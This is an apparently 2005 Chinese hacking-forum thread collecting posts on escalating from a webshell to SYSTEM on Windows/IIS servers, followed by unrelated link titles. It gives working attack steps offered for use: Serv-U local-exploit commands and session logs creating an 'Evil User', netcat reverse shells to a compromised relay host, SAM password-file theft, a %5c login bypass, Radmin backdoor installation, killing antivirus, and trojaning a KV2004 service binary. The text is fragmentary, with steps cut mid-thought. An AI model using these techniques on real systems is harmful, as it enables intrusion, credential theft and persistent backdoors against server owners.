黑客入侵服务器提升权限总结
以文本方式查看主题
- 电白社区 (http://www.525400.net/index.asp) |
|||
-- 作者:小飞 -- 发布时间:2005-2-23 21:30:37 -- 目前黑客入侵服务器提升权限总结 话说到花了九牛二虎的力气获得了一个webshell, 好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载 用我新建的用户和密码连接~ 如果提示没有权限,那我们就 存为xx.vbe 唔??不对啊,是来提升权限的啊,晕,接着来别半途而废。 WIN2K+IIS5.0默认情况下应用程序保护选项是“中(共用的)”,这时IIS加载isapi是用的 所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug,比如请求/scripts/test 加载这些isapi不是单以文件名做依据了,而是加了路径,应该是修正了此问题。 正常情况下这些路径都guest不能写,但如果配置不好,这些路径iis user能够写了就一样可以提升权限了 可以把ISAPIHack.dll上传到IIS的可执行目录,文件名可叫ssinc.dll或者admin.dll等(上面列的13个文件名之一)。 下载系统的 %windir%//repair//sam.*(WinNT 4下是sam._ 而Windows 2000下是sam)文件, 反弹shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" |
|||
-- 作者:小飞 -- 发布时间:2005-2-23 21:31:00 -- 动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容 autorun.inf 四 [/R] [/W] [drive1:][path1]filename 指定源文件。 [Startup] 将文件scripts.ini保存到“C://winnt//system32//GroupPolicy//Machine//Scripts” |
|||
-- 作者:小飞 -- 发布时间:2005-2-23 21:31:14 -- |
|||
-- 作者:小飞 -- 发布时间:2005-2-23 21:31:29 -- 那么你的bat就应该是: cscript C://Inetpub//AdminScripts//adsutil vbs set w3svc/inprpocessisapiapps "C://Inetpub//AdminScripts//asp.dll" "c://winnt//system32//inetsrv//httpext.dll" "c://winnt//system32//inetsrv//httpodbc.dll" "C://WINNT//system32//inetsrv//ssinc.dll" "C://WINNT//System32//msw3prt.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_aut//author.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_adm//admin.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//shtml.dll" 已测试成功!! |
|||
-- 作者:小飞 -- 发布时间:2005-2-23 21:31:44 -- 利用%5c绕过验证 --------------------------------------- 说到%5c,你是不是想起了当前流行的那个%5c暴库漏洞,呵呵,本文就是对%5c利用的探索(呵呵,当然有我提出的新东东,或许对你有帮助哦^_^)。 好,我们先追根溯源,找到那个漏洞的老底。看看绿盟2001年的漏洞公告:http://www.nsfocus.net/index.php?ac...iew&bug_id=1429 N年以前利用这个漏洞可以实现目录遍历,虽然微软出了补丁,不过好像补丁是用来限制iis只能访问虚拟目录的,所以漏洞还是存在,只不过利用方式变了。对iis来说,提交一个含有%5c的url能够找到文件,但是该文件里以相对路径引用的其他文件却找不到了(%5c是//的url编码,iis跳转到上一级目录去找,当然找不到;头晕了吧,哈哈,我也头晕啊)。 后来这个漏洞就被牛人挖掘出来了,也就是传说中的%5c暴库:由于连接数据库的文件引用的相对路径,提交%5c找不到文件,所以导致出错,iis就会老老实实的说出数据库的路径(不明白?找google)。 一个偶然的机会我发现还可以利用%5c绕过asp的验证;当我们暴库失败的时候不妨试试。 废话少说,看下面的代码: <!--#INCLUDE file="conn.asp" --> 看到没有,要想通过验证必须让数据库里的用户名密码与提交的一致;想到什么?让我们再看看数据库连接文件代码: <% 啊,有容错语句不能暴库!等等,如果提交%5c数据库找不到,由于容错,所以程序会继续执行,那么说来从数据库得到的用户名密码皆为空(想想有时暴库失败是不是看到空空的框架,因为数据都是空嘛),哈哈,这样我们就绕过验证了! 知道怎么做了吧,把登陆页面保存到本地,修改提交的url,把最后一个/改成%5c,用户名密码用空格(有的程序会检查用户名密码是否为空,空格会被程序过滤),提交,就ok了。 诶,各位不要以为我自己没事写段代码来捣鼓,实际上这个是我们学校一个高手做的留言板程序,就挂在学校的主页,呵呵。 既然弄懂了原理,当然要找实际漏洞啦,自然是拿大名鼎鼎的“洞”网论坛开刀。不过失败了,因为它的数据库连接文件里有这么一段: If Err Then 数据库找不到程序就结束了,呵呵,空欢喜一场。 接着又去down了bbsxp论坛,打开数据库连接文件,晕,根本没有容错语句;呵呵,不过可以暴库哦。 我又不是BT,所以不去找事了,写篇文章,算是给各位高手提供资料吧。 总结一下这个攻击方法成功的条件:1、数据库连接用的相对路径且仅有简单的容错语句;2、服务器iis版本为4或5;3、程序里不检查空字符或者检查时不过滤空格而比较时过滤空格;4、程序不能在一级目录 至于防范,呵呵,既然攻击条件知道了,防范措施自然也出来了^_^ |
|||
-- 作者:小飞 -- 发布时间:2005-2-23 21:32:05 -- 本篇文章结合了许多高手提升权限的技巧和自己的一些想法 当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 2.C://WINNT//system32//config进这里下它的SAM,破解用户的密码 3.C://Documents and Settings//All Users//「开始」菜单//程序看这里能跳转不,我们从这里可以获取好多有用的信息 4.c://winnt//system32//inetsrv//data就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行 5.看能否跳转到如下目录 USAGE: serv-u.exe "command" Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" <220 Serv-U FTP Server v5.2 for WinSock ready... >USER LocalAdministrator <331 User name okay, need password. ****************************************************** >PASS #l@$ak#.lk;0@P <230 User logged in, proceed. ****************************************************** >SITE MAINTENANCE ****************************************************** [+] Creating New Domain... <200-DomainID=2 <220 Domain settings saved ****************************************************** [+] Domain xl:2 created [+] Creating Evil User <200-User=xl 200 User settings saved ****************************************************** [+] Now Exploiting... >USER xl <331 User name okay, need password. ****************************************************** >PASS 111111 <230 User logged in, proceed. ****************************************************** [+] Now Executing: cacls.exe c: /E /T /G everyone:F <220 Domain deleted http://anyhost//cmd.pl?c//perl//bin//su.exe " net localgroup administrators IUSR_anyhost /add" 6.可以成功运行"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 7.还可以用这段代码试提升,好象效果不明显 用这段代码检查是否提升成功 8.C://Program Files//Java Web Start这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。 9.最后了,如果主机设置很变态,可以试下在c://Documents and Settings//All Users//「开始」菜单//程序//启动"写入bat,vbs等木马。 等到主机重启或者你ddos逼它重启,来达到权限提升的目的。 总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字"找" "上""执" 以上是本人的拙见,大家有什么好的方法多多分享 |
|||
-- 作者:小飞 -- 发布时间:2005-2-23 21:33:12 -- 本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。 废话少说,咱们进入正题。 首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell,不是DVBBS,而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的。于是,上传海洋2005a,成功获得webshell。 测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。 思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,修改up.htm里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。 传上了srv.exe和nc.exe在H://long//sun***//lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D://Documents and Settings//All Users//是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。 可以浏览D://program files//serv-u//ServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。 不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c://,运行 srv.exe “nc.exe –e cmd.exe 202.*.*.* 888”,这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888。我们在学校内网里,没有公网ip,不爽-ing。 我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。) 高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H://long//sun***//lemon,再用刚才nc得到的shell把它们copy到d://winnt//system32//下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。 一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D://program files//serv-u//里,覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。) 不管了,我们重启serv-u就ok了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon 。把它kill了。然后再运行D://program files//serv-u// ServUAdmin.exe ,这里要注意不是ServUDaemon.exe 。 好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以: ftp>quote site exec net user xr rain /add 在webshell上运行net user,就可以看见添加成功了。 整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit可以做到的,但是我们觉得系统自带的服务才是最安全的后门。 |
|||
-- 作者:小飞 -- 发布时间:2005-2-23 21:33:31 --
|
|||
-- 作者:小飞 -- 发布时间:2005-2-23 21:33:49 -- 巧用asp木马和KV2004得到管理员权限 重来没写过什么文章,这是第一次,写的不好请大家原谅,高手也不要取笑哦。这里也没什么技术可言,只是我这个菜鸟的一点心得,ok开始。。。 或者上传文件。行动!在kv2004下随便找个htm文件删除:(看看有无写删权限) 奇怪了,再来看看文件甲属性 哦是只读。 ok!在试试 成功了!好写个起用帐号和提升权限的bat文件,然后把bat文件和kv2004的系统服务文件KVSrvXP.exe捆绑起来,(注意多下种捆绑器,捆绑一 次用kv2004来扫描一次,因为很多捆绑器生成的文件kv会把他作为病毒来处理掉)准备上传了,先删掉原来的KVSrvXP.exe。 可能是KVSrvXP.exe被windows调用中,删不掉。没办法了吗?不,删不掉我改名 OK!然后用asp木马把修改了的KVSrvXP.exe上传到kv2004中,接下来就去睡觉把。 已经在administrators组中,接下来要关防火墙,关杀毒软件,还是种木马你随便我了,哈哈! |
|||
-- 作者:小飞 -- 发布时间:2005-2-23 21:34:20 --
|
黑客入侵服务器提升权限总结相关推荐
- 黑客入侵万象服务器的方法
黑客入侵万象服务器的方法 2005-05-30 15:07 作者: 出处: 天极Blog 责任编辑:原野 如今,很多网吧都安装了万象网吧管理系统,这种系统所带来的方便是有目共睹的.但是,越是便捷的系统 ...
- 黑客入侵你Linux服务器的一万种玩法...
作者:高俊峰 编辑:陶家龙.孙淑娟 出处:https://www.cnblogs.com/MYSQLZOUQI/p/5317916.html 安全是 IT 行业一个老生常谈的话题了,从之前的" ...
- 黑客入侵微软邮件服务器部署勒索软件、惠普更新打印机漏洞|12月2日全球网络安全热点
安全资讯报告 黑客因通过SIM卡劫持窃取数百万美元的加密货币而被判入狱 美国司法部(DoJ)表示,与名为The Community的国际黑客组织有关联的第六名成员因涉及数百万美元的SIM交换阴谋而被判 ...
- 不可能!我的内网服务器怎么会被黑客入侵?
文章目录 背景 一.解决办法 1.查看max_allowed_packet设置 2.设置方式 二.揪出内鬼 1.查日志(打开genearl_log) 2.结论 三.疑问 1.MySQL是部署内网的,外 ...
- Windows服务器如何防止黑客入侵的安全设置
Windows服务器如何防止黑客入侵的安全设置 很多的站长遇到过网站被挂马,清了后又马上有,尤其是织梦的程序,建议您做好以下的安全设置会很有效的防止被入侵和挂木马. 账户管理和认证授权 1.账号设置 ...
- 云服务器反黑客入侵攻防实录(一)
1.引言 网络安全是互联网永不过时的主题,尤其是在云计算时代,大量的计算机应用迁移到云端,庞大的IT资产集结在云数据中心,一旦云数据中心爆发安全险情,轻则大量服务停摆,重则敏感数据丢失.系统遭到破坏, ...
- 关于ASP木马提升权限
来源: http://www.17nc.com/ 现在ASP木马是漫天飞,我有一次进去后发现竟然用30多个ASP木马,在帮管理员清理了后,真是累爬了.想想管理员还真是懒的可以-- 上传了ASP木马之后 ...
- 六种黑客入侵手机的常见方式
六种黑客入侵手机的常见方式 在移动网络科技高速发展的今天,我们每个人的手机都有可能成为黑客攻击的对象,下面为大家介绍6种黑客入侵手机的常见方式,希望能够帮助大家避免手机被不对象攻击. 1.网络钓鱼攻击 ...
- 细节!从solar winds黑客入侵事件中看供应链安全
从solar winds黑客入侵事件中看供应链安全 最新消息显示,美国和英国正式将俄罗斯对外情报局(SVR)认定为SolarWinds 黑客入侵事件的幕后黑手.为此,美国财政部已对俄罗斯实施全面制裁, ...
最新文章
- odbc里面没有Microsoft Access Driver(*.mdb)问题解决
- 【 MATLAB 】legend 的使用简析
- 《大道至简》第一章伪代码
- 微服务升级优点_微服务–——定义, 原则 和 优点
- vue怎么使用php调取数据,vue 数据操作
- window 创建python虚拟环境
- springboot mybatisplus 多数据源_【SpringBoot DB 系列】MybatisPlus 多数据源配置
- win10更新1809版本后运行Dev-cpp, dos控制台字符乱码解决方法
- 魔方机器人之下位机编程-----两种串口通信方式的比较
- 禁止电脑任何软件弹出窗口
- 【前端学习笔记】微信小程序vue 组件式开发
- 第四章 向量代数与空间解析几何
- android时间格式am pm,pm时间(am.pm正确时间书写格式)
- CUDA C编程(三十)OpenACC的使用
- matlab 画黄金螺旋,分享:黄金比例螺旋展开线绘制
- Linux设备模型(2)——Kobject
- 两小时学会MySQL查询语句(上篇)
- (二)FirePower-FTD初始化设置并加入到FMC管理
- 梆梆加固,启动就闪退了
- 探索性测试与脚本测试:谁赢了?
热门文章
- [游戏开发][Unity] TPS射击游戏相机实现
- 养生之道中的服药进食时间、经络与健康的关系
- Speeding up Graph Edit Distance Computation with a Bipartite Heuristic 使用二部图匹配寻找顶点的最佳映射
- 机器学习在马蜂窝酒店聚合中的应用初探
- Linux下动态库和静态库制作与调用
- 详解TCP协议(四)——传输中的流量控制
- openstack neutron sriov部署
- MySQL-如何定位慢查询SQL以及优化
- 2018北大暑校acm算法训练课程 Tian Ji -- The Horse Racing 贪心
- Blender初学记录:制作简易头发